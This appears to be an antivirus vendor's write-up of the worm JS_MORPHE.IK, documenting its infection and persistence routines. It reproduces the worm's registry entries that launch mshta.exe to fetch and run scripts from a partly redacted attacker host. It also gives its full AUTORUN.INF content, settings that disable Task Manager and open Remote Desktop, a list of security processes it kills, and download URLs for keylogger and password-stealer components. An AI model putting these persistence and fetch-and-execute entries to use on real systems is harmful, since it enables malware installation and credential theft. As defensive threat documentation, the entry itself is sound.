JS_MORPHE.IK

This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It may be hosted on a website and run when a user accesses the said website.

It adds certain registry entries to disable the Task Manager. This action prevents users from terminating the malware process, which can usually be done via the Task Manager.

It drops an AUTORUN.INF file to automatically execute the copies it drops when a user accesses the drives of an affected system.

Arrival Details

This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It may be hosted on a website and run when a user accesses the said website.

Installation

This worm drops and executes the following files:

• %Desktop%\msn\d.tpl - same detection name
• %Desktop%\msn\d.reg - detected as REG_MORPHE.A

(Note: %Desktop% is the current user's desktop, which is usually C:\Windows\Profiles\{user name}\Desktop on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Desktop on Windows NT, and C:\Documents and Settings\{User Name}\Desktop on Windows 2000, XP, and Server 2003.)

Autostart Technique

This worm adds the following registry entries to enable its automatic execution at every system startup:

HKEY_CLASSES_ROOT\WinRAR\shell\
open\command
{default} = ""%System%\mshta.exe\" "http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/nfiles/exec.php?t={current date and time};p=WinRar;f=%1\""

HKEY_CLASSES_ROOT\Directory\shell\
DOSAqui
{default} = "Abrir Carpeta"

HKEY_CLASSES_ROOT\Directory\shell\
DOSAqui\Command
{default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"

HKEY_CLASSES_ROOT\Drive\shell\
DOSAqui
{default} = "Abrir Unidad de Disco"

HKEY_CLASSES_ROOT\Drive\shell\
DOSAqui\Command
{default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"

Other System Modifications

This worm adds the following registry entries as part of its installation routine:

HKEY_CURRENT_USER\Software\Microsoft\
Internet Explorer\Main
Start Page = "http://mail-live.no-ip.info"

HKEY_CURRENT_USER\Software\Microsoft\
Internet Explorer\Main
Window Title = "::M0rPheU$:: v2.1"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Control\Terminal Server
fDenyTSConnections = "0"

It adds the following registry entries to disable the Task Manager:

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
DisableTaskMgr = "1"

Propagation

This worm drops an AUTORUN.INF file to automatically execute the copies it drops when a user accesses the drives of an affected system.

The said .INF file contains the following strings:

[autorun]
open=\"inf.exe\"
icon=\"%SystemRoot%\system32\SHELL32.dll,8\"
action=Abrir carpeta para ver archivos
shell\open=Abrir carpeta para ver archivos
shell\open\command=\"inf.exe\"
shell\open\default=^1

Process Termination

This worm terminates the following processes if found running in the affected system's memory:

• avgnt.exe
• avguard.exe
• avshadow.exe
• chrome.exe
• firefox.exe
• GoogleUpdate.exe
• msnmsgr.exe
• GoogleCrashHandler.exe
• mailpv.exe

Dropping Routine

This worm drops the following files:

• %User Profile%\Datos de programa\Microsoft\Internet Explorer\Quick Launch\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
• %Desktop%\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
• %System Root%\Documents and Settings\All Users\Desktop\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
• %System Root%\Documents and Settings\All Users\Start Menu\Programs\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
• %System Root%\Documents and Settings\All Users\Start Menu\Programs\Startup\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
• %System Root%\Documents and Settings\All Users\Start Menu\Programs\Startup\Actualizaciones de Windows Live.lnk - detected as LNK_MORPHE.III
• %System Root%\Documents and Settings\All Users\Start Menu\Programs\Startup\Detector de Spywares de Windows Live.lnk - detected as LNK_MORPHE.III
• %User Startup%\Actualizaciones de Windows Live.lnk - detected as LNK_MORPHE.III
• %User Startup%\Detector de Spywares de Windows Live.lnk - detected as LNK_MORPHE.III
• %StartMenu%\Programs\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
• %StartMenu%\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
• %%User Profile%\Recent\Windows Live Messenger.lnk - detected as LNK_MORPHE.III

(Note: %User Profile% is the current user's profile folder, which is usually C:\Windows\Profiles\{user name} on Windows 98 and ME, C:\WINNT\Profiles\{user name} on Windows NT, and C:\Documents and Settings\{user name} on Windows 2000, XP, and Server 2003.. %Desktop% is the current user's desktop, which is usually C:\Windows\Profiles\{user name}\Desktop on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Desktop on Windows NT, and C:\Documents and Settings\{User Name}\Desktop on Windows 2000, XP, and Server 2003.. %System Root% is the root folder, which is usually C:\. It is also where the operating system is located.. %User Startup% is the current user's Startup folder, which is usually C:\Windows\Profiles\{user name}\Start Menu\Programs\Startup on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Start Menu\Programs\Startup on Windows NT, and C:\Documents and Settings\{User name}\Start Menu\Programs\Startup.)

Download Routine

This worm connects to the following website(s) to download and execute a malicious file:

• http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msn/msn.js

NOTES:

This worm drops the following files in all physical and removable drives found in the affected system:

• inf.exe - detected as TSPY_SPYEKS.C
• Windows Live Messenger.lnk - detected as LNK_MORPHE.III

It searches for subfolders in the following folders then drops a shortcut link as {folder name}.lnk:

• {drive letter}
• %Desktop%
• %User Profile%\My Documents
• %Start Menu%
• %Start Menu%\Programs
• %Start Menu%\Programas

It modifies the attributes of folders found into Hidden to trick the users that the folders have been deleted. The dropped shortcut links are detected as LNK_MORPHE.III.

It creates a duplicate copy of the following files with a different file name:

• %Desktop%\msn\m2011.tt copied as %Desktop%\msn\m2011.exe
• %Desktop%\msn\mailpv.tt copied as %Desktop%\msn\mailpv.exe

It then executes the copied files. As a result, malicious routines of the copied files are exhibited on the affected system.

This worm connects to the following URLs to download its components and renames them before storing in the affected system:

• http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/key.tt - saved as %Desktop%\msn\inf.tt - detected as TSPY_SPYEKS.C
• http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/mailer.js - saved as %Desktop%\msn\mailer.tpl - detected as JS_MAILER.AC
• http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/mailpv.js - saved as %Desktop%\msn\mailpv.tt - detected as HKTL_MAILPASSVIE
• http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/key.tt - saved as %Desktop%\msn\m2011.tt - detected as TSPY_SPYEKS.C
• http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/morph.jpg - saved as %Desktop%\msn\M0rPheU$_Esta_Aqui.jpg
• http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/MA.tt - saved as %Desktop%\msn\Mejores Amigos.zip - detected as LNK_MORPHEUS.VTG

It sends a ping command to the following IP addresses:

• {BLOCKED}.{BLOCKED}.179.157
• {BLOCKED}.{BLOCKED}.221.201

It changes the attribute of the folder %Desktop%\msn to Hidden.